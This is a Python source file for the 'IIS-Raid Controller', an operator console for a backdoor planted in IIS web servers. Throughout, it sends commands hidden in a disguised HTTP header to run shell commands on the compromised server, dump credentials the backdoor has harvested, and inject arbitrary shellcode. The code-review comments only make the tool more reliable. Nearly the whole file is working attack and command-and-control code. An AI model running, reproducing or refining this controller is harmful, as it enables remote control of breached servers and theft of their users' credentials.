import requests
import argparse
import base64
import cmd
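class Prompt(cmd.Cmd):
    """Interactive shell that drives the backdoor via the module-level helpers.

    Each ``do_*`` method forwards to ``InjectShellcode``, ``ExecuteCommand`` or
    ``DumpCreds``; the ``help_*`` methods hold the text shown by ``help <cmd>``.
    """

    def help_cmd(self):
        print("Execute a command on the server.\nUsage: cmd <command to execute>\n")

    def help_exit(self):
        print("Exits")

    def help_inject(self):
        print("Inject shellcode on the server.\nUsage: inject <file>\n")

    def help_dump(self):
        print("Dump extracted credentials.\nUsage: dump\n")

    def do_inject(self, shellcode):
        """Send the raw shellcode held in the file whose path is ``shellcode``."""
        # Mirrors do_cmd: an empty argument used to reach open("") and kill the
        # whole loop with FileNotFoundError.
        if shellcode != "":
            InjectShellcode(shellcode)
        else:
            print("Specify a file.")

    def do_cmd(self, command):
        """Run ``command`` on the server and print its output."""
        if command != "":
            ExecuteCommand(command)
        else:
            print("Specify a command.")

    def do_dump(self, ignore):
        """Print the credentials the backdoor has collected so far."""
        DumpCreds()

    def do_exit(self, ignore):
        """Leave the shell; returning True is how Cmd asks cmdloop() to stop."""
        return True

    def do_EOF(self, ignore):
        """Treat Ctrl-D like ``exit``.

        Cmd turns end-of-input into the command ``EOF``; without this handler
        that falls to ``default()`` and the loop re-reads EOF forever.
        """
        print()
        return True

    def emptyline(self):
        """Ignore blank lines (Cmd's default would repeat the last command)."""
        pass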
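def SendRequest(data, timeout=30):
    """Send one command frame to the backdoor and return its decoded reply.

    The frame travels in the request header named by ``args.header`` and the
    pre-shared password in ``X-Password``; the reply is read back out of the
    same header, base64-decoded and then decoded as gb2312 (whatever the
    server side emits — not verifiable from this file).

    Args:
        data: Frame to send, e.g. ``"CMD|whoami"``.
        timeout: Seconds to wait for the HTTP round trip. The original had no
            timeout, so a stalled or black-holed server hung the shell.

    Returns:
        The reply text.

    Raises:
        SystemExit: with status 1 on an unsupported ``args.method``, a
            transport error, a non-200 status, a missing reply header or a
            reply that is not valid base64. (The original exited with 0 on
            every failure, which made scripted use impossible.)
    """
    # NOTE(review): the password is sent as a plain request header, so only
    # the transport protects it; the URL should normally be https://.
    headers = {args.header: data, "X-Password": args.password}
    method = args.method.upper()
    if method == "GET":
        send = requests.get
    elif method == "POST":
        send = requests.post
    else:
        # The original left ``resp`` unbound here and died with UnboundLocalError.
        print("[-] Unsupported method : " + str(args.method))
        raise SystemExit(1)
    try:
        resp = send(args.url, headers=headers, timeout=timeout)
    except requests.exceptions.RequestException as err:
        # Connection refused / DNS failure / timeout used to surface as a traceback.
        print("[-] Request failed : " + str(err))
        raise SystemExit(1)
    if resp.status_code != 200:
        print("[-] Status code invalid : " + str(resp.status_code))
        raise SystemExit(1)
    try:
        encoded_response = resp.headers[args.header]
    except KeyError:
        print("[-] Header not found. Invalid password or backdoor is not present. [-]")
        raise SystemExit(1)
    try:
        raw = base64.b64decode(encoded_response)
    except ValueError as err:  # binascii.Error is a ValueError subclass
        print("[-] Reply is not valid base64 : " + str(err))
        raise SystemExit(1)
    # errors="replace" keeps partial command output readable instead of
    # aborting the session on one undecodable byte; PONG/DONE checks are
    # unaffected.
    return raw.decode("gb2312", errors="replace")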
def Check():
    """Probe the backdoor with the ping frame; return True only on a ``PONG`` reply."""
    target = args.url
    print("[+] Testing URL {0}".format(target))
    alive = SendRequest("PIN|G") == "PONG"
    if alive:
        print("[+] Successfully connected to {0}\n".format(target))
    return alive
def ExecuteCommand(command):
    """Run ``command`` on the server and print whatever the backdoor sends back."""
    output = SendRequest("CMD|" + command)
    print("[+] Received output [+]\n" + output)
def DumpCreds():
    """Ask the backdoor for the credentials it has captured and print them."""
    output = SendRequest("DMP|CREDS")
    print("[+] Received output [+]\n" + output)
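def InjectShellcode(file):
    """Upload the raw shellcode in ``file`` and report whether the backdoor accepted it.

    Args:
        file: Path to a file holding raw shellcode bytes (sent base64-encoded).

    Returns:
        True when the backdoor answered ``DONE``; False when the file could
        not be read, is empty, or the reply was anything else. The original
        printed nothing on a non-DONE reply, so failures were invisible, and
        a bad path escaped as a traceback that killed the command loop.
    """
    try:
        with open(file, "rb") as binaryfile:
            shellcode = binaryfile.read()
    except OSError as err:
        print("[-] Cannot read shellcode file : " + str(err))
        return False
    print("[+] Shellcode size : {0}".format(len(shellcode)))
    if not shellcode:
        # Sending "INJ|" with no payload cannot be what the operator wanted.
        print("[-] Shellcode file is empty, nothing sent")
        return False
    encoded_shellcode = base64.b64encode(shellcode).decode("utf-8")
    response = SendRequest("INJ|" + encoded_shellcode)
    if response == "DONE":
        print("[+] Shellcode Injected Successfully")
        return True
    print("[-] Injection failed, server replied : " + response)
    return False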
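# IIS-Raid
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="IIS-Raid Controller")
    parser.add_argument('--url', required=True, type=str, help="URL to use for communication.")
    parser.add_argument('--header', type=str, default="X-Chrome-Variations", help="Header to use for communication.")
    # Restricting choices here means SendRequest never sees a verb it cannot
    # dispatch; str.upper lets "get"/"post" through as well.
    parser.add_argument('--method', type=str.upper, choices=["GET", "POST"], default="GET", help="Method to use for communication.")
    # NOTE(review): a password given on the command line ends up in shell
    # history and in the process list of anyone on the operator box; reading
    # it from the environment or a prompt would be safer.
    parser.add_argument('--password', required=True, type=str, help="Pre-shared password.")
    args = parser.parse_args()
    if Check():
        p = Prompt()
        p.prompt = "IIS-RAID #> "
        try:
            p.cmdloop()
        except KeyboardInterrupt:
            # Ctrl-C used to dump a traceback; leave quietly like `exit` does.
            print()
    else:
        print("[-] Failed to connect to {0} ".format(args.url))
        # Non-zero so a wrapper script can tell a failed probe from success.
        raise SystemExit(1)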